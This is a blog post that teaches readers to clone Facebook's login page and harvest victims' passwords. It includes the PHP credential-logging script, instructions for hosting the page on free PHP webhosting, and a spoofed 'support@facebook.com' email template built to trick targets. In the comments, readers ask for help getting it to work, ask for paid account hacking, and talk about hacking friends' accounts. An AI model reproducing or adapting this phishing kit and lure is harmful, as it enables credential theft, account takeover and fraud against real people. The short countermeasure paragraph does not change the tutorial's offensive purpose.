Facebook Phishing Tutorial


Here I will show you how you can create fake facebook log-in page and then fool your victim to put his username and password in it so that you can get his account password.

You need 3 files Index.html, phish.php, passwords.txt to create a fake facebook login page.

To create index.html:

First of all open www.facebook.com in your web browser, from “file” menu select “save as” and type “index” in file name and select “web page complete” from save as menu. Once done you will have a file named “index.html” and a folder named “index_files”. Folder will have several files in it, let them as it is and open index.html in notepad or word-pad. From edit menu select find, type action in it and locate following string.
action="https://www.facebook.com/login.php?login_attempt=1"

Now replace this string with action= “phish.php” and also change the method in html from 'post' to 'get'.
save the document.

To create phish.php:

Now open notepad type following php code in it and create phish.php.


<?php
header("Location: https://www.facebook.com/login.php?login_attempt=1 ");
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Now simply create text document and rename it as passwords.txt

Now you'll need a free web hosting service that supports PHP. I suggest you to use http://www.000webhost.com/



Open the site and create an account. Once you have created your account, you login to your account and go to control panel.
In the control panel choose file manager and upload the 3 files index.html, phish.php, passwords.txt in public directory.



Now create a new directory there and name it as index_files. Now open it and upload all the files in index_files folder formed while saving facebook page to it.

Don't forget to change Chmod permissions for passwords.txt to 777. Once done make index.html your index page and make site live.

Now create a spoofed email using my Anonymous mailer, from support@facebook.com to your victim.
Sub: Invalid activity on your facebook account.
Body:
Hey (victim's facebook user name),
Recently we saw some suspicious activity on your account, we suspect it as a malicious script. As a valuable user to us we understand this might be system error, if the activity is not generated by you then please log-in to your account by following link,
<link to phished site> normally it will be http://yourusername.somex.com/index.html
Failing to log-in within next 48 hours Facebook holds right to suspend your account for sake of privacy of you and others. By logging in you'll confirm it is system error and we will fix it in no time. Your inconvenience is regretted. Thank you.

support@facebook.com, 
Facebook, Inc,
1601 S.California Ave
Palo Alto CA 94394
US

If your victim is not security focused, he/she will surely fall prey to it. And will log-in using phished site handing you his password in passwords.txt file. 



Please note that you must use that email id of victim which he/she uses to log in facebook. If you are in his/her friend list then click on information tab to know log-in email ID.


Countermeasure:
You must not reply any message from facebook may it be legitimate or not by clicking on any links that appear in mail box. Better whenever you receive any mail of this type report it to facebook.com by logging via typing www.facebook.com in your web browser.

Download files from the following link.

27 comments:

  1. not working , passwords are not saving in passwords.txt

    ReplyDelete
    Replies
    1. Friends, now a day most free PHP webhosting sites like 000webhost, My3gb etc are either not allowing Phishing PHP scripts or manually checking PHP scripts uploading in their sites. So Try different webhosts, the proceadure i explained above is the standard procedure we use to hack Facebook Passwords.

      Delete
  2. this is not working,,,,passwords.txt is blank,,,,,,

    ReplyDelete
  3. that code is already detect on facebook...and its not working anymore :///

    ReplyDelete
  4. hw 2 mk index.html page as index page nd mk it live...m nt able 2 do it,plzz explain??nd wich webhosts v shud use??

    ReplyDelete
  5. sorry,maybe u can print screen each step for make easy understanding.tq~

    ReplyDelete
  6. In Mobile You Can Phish Like This Mr. Kumar...

    ReplyDelete
  7. hmm..m fan of u..but m not oposing u..but actualy this tecniq wont work anymore..ofcourse at all..bcoz almost al browsers gona find dis spam and also by antivirus..so its impossible with dis techniq from d security we hav..and one more is even webhostng sites also wont alow 4 dis purpose..u already knw dat..we can use webhosting site nly for nce and if dey find our illigal works den immediatly blocks our account..
    and we had a new phishing techniq..by using this techniq facebuk fake page seems like exactly like original.. www.facebook.com
    so we hav a chances from escaping from antivirus and browsers..but m not saying sure it works..bcoz facebuk getng recoverd from several bugs dialy..and by using backtrack also may help us..
    but one thing guyz..if we hav a good knowledge in internet spaming and litle concentration on our victims defnelty we can hack our frndz,gfz..etc anyonez account..datz sure..

    ReplyDelete
  8. what was that??? " change the method in html from "post" to "get"???

    i am not able to understand tha.........plz help

    ReplyDelete
    Replies
    1. Open index.html in notepd and search for something like
      Change dat action ="http://www.facebook.com/.." to action="phish.php" and also change method="post" to method="get" snd save this file

      Hope dis will help u for any queries contact me on fb http://www.facebook.com/Snkt.pat2

      Delete
  9. Nice information about facebook. i read another article on your website which shows great information :D

    From,
    Using Google Sites :- Create Facebook Apps

    ReplyDelete
  10. hey anyone here , can somebody pls tell how cud i make index.html file as the index page and make the site alive , i have a little bit confusion there , cuz there are no options given for that , , pls help guys pls help!

    ReplyDelete
  11. hey if i'm not able to.. can you hack the account i want to?
    anyone????
    pleasee?
    i really need to have an access to that account.. means a lot to me.. trust me not for any other purpose.. just need to access it somehow.... someone please help?

    ReplyDelete
  12. HOW CAN WE ENABLE INDEX.HTML AND SEND MAIL

    ReplyDelete
  13. can somebody pls tell how cud i make index.html file as the index page and make the site alive , i have a little bit confusion there , cuz there are no options given for that , , pls help guys pls help!

    ReplyDelete
  14. This comment has been removed by the author.

    ReplyDelete
  15. create free site here http://www.000webhost.com/713013.html

    ReplyDelete
  16. U r wrong mr. Santosh .i m sad coz i need it.
    Mai tumko fb hack krna batauga .
    Kuchh tim lgega

    ReplyDelete
  17. I am in need of a facebook hack ... is there a service that can actually get me the login by paying ...

    ReplyDelete
  18. This script works, but he got the method wrong. let it stay as POST. Dont Change it into GET. then you will see.. good luck guys. install the Wampserver and try it first

    ReplyDelete
  19. can somebody pls tell how cud i make index.html file as the index page and make the site available ?????

    ReplyDelete
  20. sir.. can you plz tell me that how can i make a spoofed email ,, i hv done all except this.

    ReplyDelete
Related Posts Plugin for WordPress, Blogger...